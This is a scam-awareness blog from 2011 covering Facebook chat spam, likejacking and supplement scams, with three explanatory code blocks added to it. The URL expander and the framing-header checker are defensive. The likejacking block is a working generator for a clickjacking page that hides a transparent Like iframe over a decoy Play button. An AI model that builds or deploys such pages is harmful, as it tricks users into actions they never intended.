Wednesday, 23 March 2011

Facebook Facing Wave of Facebook Chat Attacks

The popular social networking site Facebook, a constant target for scammers and hoaxers, has recently been facing a surge of attacks aimed at the instant chat feature built into the website.

Facebook users have been complaining about malicious links circulating automatically through the Chat facility that direct unwitting users to application installation pages. Such Facebook applications are typically survey scams: victims are told to complete surveys, and each completed survey earns the scammers money.

The surge of attacks using the Chat facility has led many people to blame “self-generating viruses” (see here for our article on that warning), worms and Koobface, when in reality the blame lies with rogue, self-propagating Facebook applications.
The links circulating through Chat are paired with a curiosity-baiting message designed to get victims to click. Once clicked, users are taken to a page like the one below.



As you can see from the permissions page of this application installation page, the Facebook application wants access to your Facebook Chat facility. It needs this so it can send the same message that fooled you on to your Facebook contacts. That permission request is the tell: a video or photo has no reason to need your chat.
Additionally, once the application is installed, users are typically urged to complete a survey to see or receive whatever the original Chat message promised.

The messages circulating through chat vary, but some popular ones include:

"OMG: This girl killed herself after her FATHER posted this message on her wall"
(again!)

"It will make you reevaluate what you put on your wall after seeing this"

"hey lol check out this girl,she i cant believe this video"

"omg hahah have u seen this photo u got tagged in LOL"

Other similar derivatives are also used, all of them designed to exploit the potential victim's curiosity.
Worth noting is that the links bundled with these messages nearly always use the bit.ly URL shortener, which hides the true destination address.

Facebook does its best to delete such applications and usually does so within hours of them popping up, meaning many of these messages end up pointing to dead links where the application used to be, but the open nature of Facebook's application development platform means that new rogue applications are literally popping up every day.

Always be wary of links sent to you through wall postings, comments or Facebook chat, especially if the link and message seem suspicious or out of character for the sender, or if the link is disguised with a URL shortener such as bit.ly. Never install Facebook applications that appear after clicking on such links, and if you already have, see this page, which contains instructions on how to remove rogue Facebook applications.
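Expanding a shortened link before clicking it removes the disguise. The following is an added example, not code from the original post: it follows a short link's redirect chain hop by hop using only the status code and Location header of each response (what an HTTP HEAD request returns) without ever loading the final page, stops on redirect loops or after a hop limit, and reports whether the final destination is itself still a shortener. The redirect table, the host names and the `example-rogue-app.test` destination are constructed for the example; in real use `head()` would perform the HTTP HEAD request.

```javascript
// Added example (not from the original post): expand a shortened link by
// following its redirect chain without loading the final page.
//
// All URLs below are constructed for the example. In real use head(url)
// would issue an HTTP HEAD request and return { status, location } from the
// response; here a fake redirect table stands in for the network.
const SHORTENER_HOSTS = new Set(["bit.ly", "j.mp", "tinyurl.com", "goo.gl"]);

// Constructed redirect responses keyed by URL (status + Location header).
const FAKE_RESPONSES = {
  "http://bit.ly/abc123": { status: 301, location: "http://j.mp/def456" },
  // A relative Location must be resolved against the URL that returned it.
  "http://j.mp/def456": { status: 302, location: "/app/install?id=42" },
  "http://j.mp/app/install?id=42": { status: 301, location: "http://example-rogue-app.test/install" },
  "http://example-rogue-app.test/install": { status: 200 },
  // A redirect loop, so the expander must detect repeats.
  "http://bit.ly/loop1": { status: 301, location: "http://bit.ly/loop2" },
  "http://bit.ly/loop2": { status: 301, location: "http://bit.ly/loop1" },
};

function fakeHead(url) {
  return FAKE_RESPONSES[url] || { status: 404 };
}

// Follow 3xx responses from startUrl until a non-redirect is reached.
// Returns the final URL, the full chain of hops, and flags for redirect
// loops and for chains cut off by the hop limit.
function expandShortUrl(startUrl, head = fakeHead, maxHops = 10) {
  const chain = [startUrl];
  const seen = new Set([startUrl]);
  let current = startUrl;
  for (let hop = 0; hop < maxHops; hop++) {
    const resp = head(current);
    const redirect = resp.status >= 300 && resp.status < 400 && resp.location;
    if (!redirect) {
      return { finalUrl: current, chain, hops: chain.length - 1,
               status: resp.status, loop: false, truncated: false };
    }
    // Location may be relative; resolve it against the current URL.
    const next = new URL(resp.location, current).toString();
    if (seen.has(next)) {
      return { finalUrl: next, chain, hops: chain.length - 1,
               status: resp.status, loop: true, truncated: false };
    }
    seen.add(next);
    chain.push(next);
    current = next;
  }
  return { finalUrl: current, chain, hops: chain.length - 1,
           status: null, loop: false, truncated: true };
}

// True when the URL's host is a known shortener, i.e. the real destination
// is still hidden behind another hop.
function isShortenerHost(url) {
  return SHORTENER_HOSTS.has(new URL(url).hostname.toLowerCase());
}

// Stand-alone demonstration (skipped when the file is imported).
if (typeof require !== "undefined" && require.main === module) {
  for (const link of ["http://bit.ly/abc123", "http://bit.ly/loop1"]) {
    const r = expandShortUrl(link);
    console.log(link, "->", r.finalUrl, r.loop ? "(redirect loop)" : `(${r.hops} hops)`);
  }
}
```

The hop limit and the loop check are what keep this safe to run against an arbitrary link: a chain that never terminates, or one that bounces between two shorteners, returns with `truncated` or `loop` set instead of hanging, and the caller can still inspect `chain` to see every intermediate host.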

Monday, 21 March 2011

Facebook Fight Back Against Likejacking Scams

Last week's blog post was about clickjacking (also dubbed likejacking) scams, so we won't go into much detail about how they work, other than to say it is the recently prolific trick of hiding a Facebook Like button underneath an image in a bid to trick online viewers into clicking it and inadvertently liking an external page.

However, Facebook has now stopped such scams in their tracks by replacing the one-click Like button with a new version that requires users to confirm their “Like” before the action is posted to their news feed.

The update, which has already been implemented, removes the one-click nature of the Like button by replacing it with a three-step process. First, a user clicks the Like button displayed on a website and the word Confirm appears. Clicking Confirm opens a pop-up giving information about the web page the user is about to Like. The user then has the opportunity to confirm the “Like” action or cancel it altogether.

Of course this means Facebook clickjacking scams, which rely on a user inadvertently clicking a Like button and hence “liking” a page, become almost impossible, since the user now has to confirm a pop-up to complete the “liking” process, giving potential victims a chance to cancel the action once they realise they have been duped. The pop-up matters more than the extra click: a second in-page button could be hidden under a decoy just like the first, whereas a dialog that names the page about to be liked is far harder to disguise.

Whilst clickjacking is a broader term that is not specific to Facebook, this change may mean we have seen the last of Facebook clickjacking (likejacking) scams.

The move is also going to earn Facebook some rare positive feedback from privacy and security experts, amid all the current controversy the social networking giant is facing, specifically the imminent move to begin sharing the contact details of Facebook users with third-party Facebook application developers.

Monday, 14 March 2011

Facebook Clickjacking Attacks

In a nutshell…

Clickjacking, in its broadest sense, is an attack in which an invisible control is placed over the visible content of a web page so that it receives the victim's click. The victim believes their click will do one thing, such as play a video, unaware that the hidden element is present and that the click has performed a completely different, unwanted action.

Facebook clickjacking attacks are among the most prevalent, and are most commonly designed to get Facebook users to unwittingly "like" external websites, which in turn spreads those websites to the user's contacts.

Facebook clickjacking attacks are also dubbed "likejacking" because they abuse the "like" feature on Facebook.

How it works…

Anyone familiar with Facebook and how it operates will also be familiar with the ability to "Like" items such as comments, videos and status updates. When a Facebook user "likes" something, a post saying they "liked" it appears on their Facebook Wall, which in turn appears in the news feed of many of their contacts.
A recent addition to the "Like" feature is that website developers can add a button to their own websites that allows Facebook users to "Like" the website by clicking it, meaning Facebook users do not have to be within the Facebook environment to use this feature. The button is served by Facebook and embedded in the third-party page, which is exactly what makes it possible to hide.

This has led to scammers hiding the Facebook "Like" button on their websites and tricking users into clicking the area of the page that contains it, so the user inadvertently “likes” the website by clicking what looks like ordinary page content. The user is unaware that they have "liked" a web page and that this action has been published on their Facebook Wall and in the news feed of many of their contacts.

The clickjacking is designed to bait people into "liking" a page so that the page propagates between Facebook users: contacts who see that their Facebook “friend” has “liked” a page are likely to visit it and fall for the same trap.

Popular Examples

The most prolific example of a clickjacking attack is one where Facebook users are baited with a non-existent video. They are taken to a page that replicates a typical video-sharing site. Users are plainly invited to click the Play icon in the middle of the video frame, and this is where the hidden Facebook "Like" button is located. Clicking the Play button causes the user to “like” the web page.

Some sites try to replicate YouTube. Some use a logo reading TouTube, FouTube or FBTube.

Other popular examples include asking users to "prove they're human" by clicking certain areas of a web page in a certain order. The Facebook "Like" button is simply hidden in one of these areas.
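To make the Play-button example concrete, here is an added illustration (not the scammers' code and not from the original post) of how such a page is put together in plain HTML and CSS. The visible decoy is a fake Play icon; the real Like button lives in an iframe made fully transparent with `opacity:0` and stacked above the decoy with `z-index`, and the iframe is offset so that the Like button sits exactly under the decoy. The Like plugin URL, the button's position inside the plugin frame and all pixel sizes are assumed values. Note that no script is involved anywhere in the page, which is why turning JavaScript off does not by itself defeat the trick.

```javascript
// Added example, not the scammers' page and not from the original post: the
// layout trick behind a "click Play to watch" likejacking page. Assumed
// values: the Like plugin URL, the Like button's position inside the plugin
// frame, and all pixel sizes.

// Boxes are { x, y, w, h } in CSS pixels. `decoy` is where the fake Play
// icon is drawn on the page; `control` is where the Like button sits
// relative to the top-left corner of the plugin iframe.

// Offset for the iframe so that the hidden control is centred under the decoy.
function alignOverlay(decoy, control) {
  return {
    left: decoy.x + (decoy.w - control.w) / 2 - control.x,
    top: decoy.y + (decoy.h - control.h) / 2 - control.y,
  };
}

// Where the hidden control ends up on the page for a given iframe offset;
// used to verify the alignment.
function controlOnPage(offset, control) {
  return { x: offset.left + control.x, y: offset.top + control.y,
           w: control.w, h: control.h };
}

function centre(box) {
  return { x: box.x + box.w / 2, y: box.y + box.h / 2 };
}

// Assemble the page: a visible decoy beneath a fully transparent iframe.
// Nothing here is script; the browser lays it out with CSS alone.
function buildLikejackPage({ likeUrl, decoy, control, frameW, frameH }) {
  const { left, top } = alignOverlay(decoy, control);
  return [
    "<!doctype html>",
    "<html><body>",
    "<!-- Visible decoy: the victim believes they are clicking Play -->",
    `<div style="position:absolute;left:${decoy.x}px;top:${decoy.y}px;` +
      `width:${decoy.w}px;height:${decoy.h}px;background:url(play.png);z-index:1"></div>`,
    "<!-- Hidden overlay: the real Like button, transparent and stacked on top -->",
    `<iframe src="${likeUrl}" scrolling="no" frameborder="0"` +
      ` style="position:absolute;left:${left}px;top:${top}px;` +
      `width:${frameW}px;height:${frameH}px;opacity:0;z-index:2"></iframe>`,
    "</body></html>",
  ].join("\n");
}

// Constructed layout for the example (all values assumed).
const EXAMPLE_LAYOUT = {
  likeUrl: "https://www.facebook.com/plugins/like.php?href=http://example-scam.test/video",
  decoy: { x: 200, y: 150, w: 60, h: 60 },   // fake Play icon on the page
  control: { x: 10, y: 5, w: 50, h: 20 },    // Like button inside the plugin frame
  frameW: 90,
  frameH: 30,
};

// Stand-alone demonstration (skipped when the file is imported).
if (typeof require !== "undefined" && require.main === module) {
  console.log(buildLikejackPage(EXAMPLE_LAYOUT));
}
```

The whole attack is the arithmetic in `alignOverlay`: once the iframe is shifted so the button's centre coincides with the decoy's centre, every click on the "Play" icon lands on the Like button instead. Facebook's later confirmation step works because it makes a single well-placed click insufficient.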

Survey Scams

2011 has seen a significant increase in clickjacking attacks used to help survey scammers. Facebook survey scams have previously used various tactics to spread, including rogue Facebook applications, forcing a user to "like" and "share" an external website, or forcing them to join a Facebook group. Clickjacking is the latest tactic survey scammers are using to spread their malicious links.

Survey scams are when scammers trick victims into completing surveys on the false promise that the victim will receive or achieve something in return. Once a victim completes a survey, the scammer gets paid. More information on Facebook survey scams can be found here.

Victim?

If you are the victim of a clickjacking attack, the first thing to do is remove the offending “like” post that your Facebook account has just produced. Go to your profile and hover over the post, click the "x" in the top right and then click Remove. This stops your Facebook contacts from falling into the same trap.

For most clickjacking attacks on Facebook this is all you need to do, since many clickjacking attacks do not involve any malicious payload.

If you think you may have downloaded something onto your computer through the attack, run an up-to-date virus scan to check for threats.

Avoiding Clickjacking Attacks

The easiest way to avoid such attacks is to be careful about which links you click on Facebook and to always be wary of suspicious links and websites. If a link offers you something you suspect does not exist or is too good to be true, it probably is.

There are more robust ways to avoid clickjacking attacks as well, such as using the Firefox web browser with its optional NoScript add-on, which blocks scripts on sites you do not trust and whose ClearClick feature warns when a click is about to land on a transparent or obscured element, the exact trick clickjacking depends on. Be aware, though, that a likejacking page needs no script at all: a hidden frame positioned with plain CSS is enough, so disabling scripts alone does not stop it.

Additionally, always make sure you use the most recent version of your Internet browser (e.g. Internet Explorer, Firefox, Opera, Chrome).
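Whether a page can be put inside a hostile frame at all is decided by that page's own response headers, not by the visitor, so the check a site owner would want is the one below. It is an added example, not from the original post: given a page origin, the origin of the site attempting to frame it, and constructed response headers, it reports whether framing is allowed, blocked, or undecidable because the header is malformed. It honours `X-Frame-Options`, which existed in 2011, and the Content-Security-Policy `frame-ancestors` directive, the later standard, which takes precedence over `X-Frame-Options` when both are present. The caveat that matters for likejacking: the Like button is a Facebook page that is designed to be framed by third-party sites, so Facebook cannot simply deny framing, which is why its fix was a confirmation step rather than a header.

```javascript
// Added example, not from the original post: decide from response headers
// whether a page can be placed in a frame by another site. All header
// values used with it are constructed.

// Case-insensitive header lookup on a plain { name: value } object.
function getHeader(headers, name) {
  const key = Object.keys(headers).find(k => k.toLowerCase() === name.toLowerCase());
  return key === undefined ? undefined : headers[key];
}

// Return the source list of a CSP frame-ancestors directive, or null if the
// policy has no such directive.
function parseFrameAncestors(csp) {
  if (!csp) return null;
  for (const directive of csp.split(";")) {
    const tokens = directive.trim().split(/\s+/).filter(Boolean);
    if (tokens.length && tokens[0].toLowerCase() === "frame-ancestors") return tokens.slice(1);
  }
  return null;
}

// Does one frame-ancestors source expression match the framing origin?
// Supports 'none', 'self', *, scheme sources (https:) and host sources with
// an optional scheme, a leading *. wildcard and an optional port.
function sourceMatches(expr, framerOrigin, pageOrigin) {
  const e = expr.toLowerCase();
  if (e === "'none'") return false;
  if (e === "'self'") return framerOrigin === pageOrigin;
  if (e === "*") return true;
  const o = new URL(framerOrigin);
  if (/^[a-z][a-z0-9+.-]*:$/.test(e)) return o.protocol === e;
  const m = e.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?([^:/]+)(?::(\d+|\*))?$/);
  if (!m) return false;
  const [, scheme, host, port] = m;
  if (scheme && o.protocol !== scheme + ":") return false;
  const hostOk = host.startsWith("*.")
    ? o.hostname.endsWith(host.slice(1)) && o.hostname.length > host.length - 1
    : o.hostname === host;
  if (!hostOk) return false;
  if (port && port !== "*") {
    const effective = o.port || (o.protocol === "https:" ? "443" : "80");
    if (port !== effective) return false;
  }
  return true;
}

// Returns "allowed", "blocked" or "unknown". A frame-ancestors directive,
// when present, takes precedence over X-Frame-Options, as the CSP
// specification requires.
function framingVerdict({ pageOrigin, framerOrigin, headers }) {
  const ancestors = parseFrameAncestors(getHeader(headers, "content-security-policy"));
  if (ancestors !== null) {
    return ancestors.some(a => sourceMatches(a, framerOrigin, pageOrigin)) ? "allowed" : "blocked";
  }
  const xfo = getHeader(headers, "x-frame-options");
  if (xfo === undefined) return "allowed";            // no framing protection at all
  const value = xfo.trim();
  const upper = value.toUpperCase();
  if (upper === "DENY") return "blocked";
  if (upper === "SAMEORIGIN") return framerOrigin === pageOrigin ? "allowed" : "blocked";
  if (upper.startsWith("ALLOW-FROM ")) {
    try {
      const allowed = new URL(value.slice("ALLOW-FROM ".length).trim()).origin;
      return allowed === framerOrigin ? "allowed" : "blocked";
    } catch (err) {
      return "unknown";                                // unparsable URI
    }
  }
  return "unknown";  // malformed or non-standard value: do not rely on it
}

// Stand-alone demonstration with constructed headers (skipped when imported).
if (typeof require !== "undefined" && require.main === module) {
  const page = "https://www.example-site.test";
  for (const headers of [{}, { "X-Frame-Options": "DENY" },
                         { "Content-Security-Policy": "frame-ancestors 'self'" }]) {
    console.log(JSON.stringify(headers), "->",
                framingVerdict({ pageOrigin: page, framerOrigin: "https://evil.test", headers }));
  }
}
```

Run this against the headers of any page that carries a sensitive one-click action; an "allowed" verdict for an arbitrary framing origin means the page can be used as the hidden layer in exactly the attack described above. An "unknown" verdict should be treated as unprotected, since browsers do not agree on how to handle malformed values.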

Tuesday, 1 March 2011

Nutritional/Dietary Supplement Scams

A quick guide to buying nutritional supplements online, and why users should always be wary when purchasing self-improvement supplements online.


Medicine changes quickly, and one of the main talking points in health and fitness over the past few years has been the use of nutritional supplements. With people's desire to live as long as possible, a healthy diet and an otherwise natural, healthy lifestyle are no longer considered sufficient, given the introduction and increasing popularity of supplements one would not otherwise take.

The subject of nutritional supplements is one that still draws considerable controversy, both from the medical and retail communities, yet it seems that dietary enhancements are becoming more popular and increasingly accepted in today's world.

However, like anything that draws controversy and increases in popularity, there are people out there who take advantage of the situation.

Beware of the Acai Berries!

One such popular supplement is commonly known as the Acai Berry, which is notoriously sold online as a dietary enhancement that purports to improve health and sexual virility and to help with weight loss. However, there is no credible evidence to back up these claims, and many websites and multi-level marketing plans selling Acai Berry based products have been shown to be both misleading and fraudulent. There are a significant number of complaints regarding these Acai schemes, varying from overcharged credit cards and consumers getting unwittingly involved in Ponzi schemes to poor products or placebos being sent to customers. These attributes have in many cases become synonymous with the online self-improvement scam industry, with a surge of thousands of sites purporting to sell "miracle dietary cures", only for the victim to find out that the claims made by the websites were false or misleading, grossly exaggerating both the benefits of using the product and the downsides of not using it.

Sites selling supplements like these are known to use many other misleading tactics, such as using the trademarked logos of legitimate news outlets and magazines to feign endorsement. Additionally, scam sites hide expensive monthly charges behind the facade of a "free trial" and automatically sign victims up to multiple subscriptions, making it harder for them to cancel and avoid further charges.

This has led to many supplement-based websites being pursued and shut down for breaching FTC guidelines that have nothing to do with supplements, including the updated FTC guidelines on the use of customer testimonials and celebrity endorsements. Such sites used faked, unverifiable customer testimonials reporting atypical results, and also employed fake celebrity endorsements. Celebrities such as Oprah Winfrey and her resident medical expert Dr. Oz were notoriously, and unwittingly, linked to these scams, which led them to file suit against a number of these sites. The sites claimed the duo endorsed their products, which was untrue.

You can read more about Acai Berry scams on our site here.

MLMs and Pyramid Schemes

Additionally, websites and multi-level marketing plans that sell a wider range of supplements have also attracted noteworthy criticism on many fronts, which has led to specific FTC guidelines on the retail and advertising of such supplements by sites and MLMs in the USA.
One controversy that has drawn fierce criticism is the often poor advice given by sites and affiliates in order to sell supplements, where making the sale is prioritised over giving sound advice to potential customers. One drawback, especially concerning MLMs that sell supplements, is the innate nature of the MLM structure, which pressures affiliates into selling as many supplements as possible with little regard to whether the end user really needs the product.
Such affiliate-based selling is also often criticised for not checking affiliates' knowledge or experience of nutritional supplements before they give advice and sell such products. There is little legislation covering this area, since these supplements are not considered [prescription] drugs, even though poor advice about supplements can still be dangerous.

Even larger MLMs such as USANA and Vitamark that focus on the sale of nutritional supplements have drawn their share of criticism and disapproval. USANA found itself in court for misleading its affiliates about potential earnings, a hallmark of shady MLM schemes. The legal-services MLM Pre-Paid Legal found itself in trouble with the SEC for similar reasons.

Nutritional advice, like medical advice, is best sought from someone qualified in the field. Whilst websites or MLM affiliates that sell supplements may in many cases be knowledgeable, there is no guarantee, and any advice is likely to be biased towards selling their products.

Our recommendation is always to get advice from your doctor or a qualified nutritionist, and if you do purchase such products online, proceed with caution and remember that the person selling you the item is just that, a salesman, not a qualified nutritionist, and any advice offered should not necessarily be taken as correct.